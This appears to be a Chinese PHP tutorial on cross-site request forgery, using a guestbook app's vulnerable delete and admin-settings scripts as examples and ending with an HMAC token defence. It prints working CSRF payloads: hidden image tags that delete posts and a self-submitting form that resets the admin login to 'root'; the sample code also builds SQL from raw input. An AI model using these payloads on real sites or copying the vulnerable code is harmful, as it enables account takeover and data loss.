php漏洞之跨网站请求伪造与防止伪造方法


Posted in PHP onAugust 15, 2013

伪造跨站请求介绍
伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:

伪造链接,引诱用户点击,或是让用户在不知情的情况下访问

伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。

比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦。
如果攻击者以隐藏的方式发送给目标用户链接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0

任意删除留言
//delbook.php 此页面用于删除留言
<?php
include_once("dlyz.php");    //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //传递要删除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('删除成功!');";
echo " location='book.php';"; 
echo "</script>";
?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>网站:<a href=https://3water.com>三水点靠木</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('修改成功!');";
echo " location='pass.php';"; 
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0"> 
<input type="text" name="username" value="root">
<input type="password" name="password" value="root"> 
<input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
<textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
</form>
</body>

存为attack.html,放到自己网站上https://3water.com此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
防止伪造跨站请求
yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg。
随机串代码实现
咱们按照这个思路,山寨一个crumb的实现,代码如下:
<?php 
class Crumb { 
CONST SALT = "your-secret-salt"; 
static $ttl = 7200; 
static public function challenge($data) { 
return hash_hmac('md5', $data, self::SALT); 
} 
static public function issueCrumb($uid, $action = -1) { 
$i = ceil(time() / self::$ttl); 
return substr(self::challenge($i . $action . $uid), -12, 10); 
} 
static public function verifyCrumb($uid, $crumb, $action = -1) { 
$i = ceil(time() / self::$ttl); 
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb || 
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb) 
return true; 
return false; 
} 
}

代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间。

应用示例

构造表单

在表单中插入一个隐藏的随机串crumb

<form method="post" action="demo.php"> 
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>"> 
<input type="text" name="content"> 
<input type="submit"> 
</form>

处理表单 demo.php

对crumb进行检查

<?php 
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) { 
//按照正常流程处理表单 
} else { 
//crumb校验失败,错误提示流程 
} 
?>
PHP 相关文章推荐
文章推荐系统(二)
Oct 09 PHP
利用 window_onload 实现select默认选择
Oct 09 PHP
一些使用频率比较高的php函数
Oct 03 PHP
PHP逐行输出(ob_flush与flush的组合)
Feb 04 PHP
解析argc argv在php中的应用
Jun 24 PHP
php小技巧之过滤ascii控制字符
May 14 PHP
php向js函数传参的几种方法
Aug 10 PHP
PHP中使用匿名函数操作数据库的例子
Nov 17 PHP
Symfony2之session与cookie用法小结
Mar 18 PHP
Zend Framework实现多文件上传功能实例
Mar 21 PHP
Laravel最佳分割路由文件(routes.php)的方式
Aug 04 PHP
PHP中的浅复制与深复制的实例详解
Oct 26 PHP
PHP Global定义全局变量使用说明
Aug 15 #PHP
php生成图形验证码几种方法小结
Aug 15 #PHP
PHP中将ip地址转成十进制数的两种实用方法
Aug 15 #PHP
PHP怎么实现网站保存快捷方式方便用户随时浏览
Aug 15 #PHP
php正则取img标记中任意属性(正则替换去掉或改变图片img标记中的任意属性)
Aug 13 #PHP
php使用sql数据库 获取字段问题介绍
Aug 12 #PHP
完美解决PHP中的Cannot modify header information 问题
Aug 12 #PHP
You might like
4月1日重磅发布!《星际争霸II》6.0.0版本更新
2020/04/09 星际争霸
php xml-rpc远程调用
2008/12/19 PHP
深入解析php之sphinx
2013/05/15 PHP
使用php实现截取指定长度
2013/08/06 PHP
ThinkPHP模板范围判断输出In标签与Range标签用法详解
2014/06/30 PHP
php通过rmdir删除目录的简单用法
2015/03/18 PHP
PHP高精确度运算BC函数库实例详解
2017/08/15 PHP
ThinkPHP防止重复提交表单的方法实例分析
2018/05/10 PHP
laravel-admin 中列表筛选方法
2019/10/03 PHP
初窥JQuery(一)jquery选择符 必备知识点
2010/11/25 Javascript
解析JavaScript中点号“.”的多义性
2013/12/02 Javascript
JavaScript中setFullYear()方法的使用详解
2015/06/11 Javascript
JavaScript代码轻松实现网页内容禁止复制(代码简单)
2015/10/23 Javascript
快速掌握Node.js环境的安装与运行方法
2016/02/16 Javascript
谈一谈bootstrap响应式布局
2016/05/23 Javascript
jQuery实现给input绑定回车事件的方法
2017/02/09 Javascript
js获取浏览器和屏幕的各种宽度高度
2017/02/22 Javascript
JavaScript中使用import 和require打包后实现原理分析
2018/03/07 Javascript
VeeValidate 的使用场景以及配置详解
2019/01/11 Javascript
详解vue中的父子传值双向绑定及数据更新问题
2019/06/13 Javascript
npm的lock机制解析
2019/06/20 Javascript
关于ligerui子页面关闭后,父页面刷新,重新加载的方法
2019/09/27 Javascript
JavaScript经典案例之简易计算器
2020/08/24 Javascript
JS数据类型分类及常用判断方法
2020/11/19 Javascript
python 示例分享---逻辑推理编程解决八皇后
2014/07/20 Python
详解Numpy中的数组拼接、合并操作(concatenate, append, stack, hstack, vstack, r_, c_等)
2019/05/27 Python
10行Python代码计算汽车数量的实现方法
2019/10/23 Python
ASP.NET Core中的配置详解
2021/02/05 Python
英国运动服、设备及配件网站:DW Sports
2019/12/04 全球购物
华为慧通笔试题
2016/04/22 面试题
外贸业务员求职信
2014/06/16 职场文书
医院领导班子四风对照检查材料
2014/09/27 职场文书
考试作弊检讨书怎么写?
2014/12/21 职场文书
2019年感恩励志演讲稿(收藏备用)
2019/09/11 职场文书
导游词之云南省玉龙雪山
2019/12/19 职场文书
基于nginx实现上游服务器动态自动上下线无需reload的实现方法
2021/03/31 Servers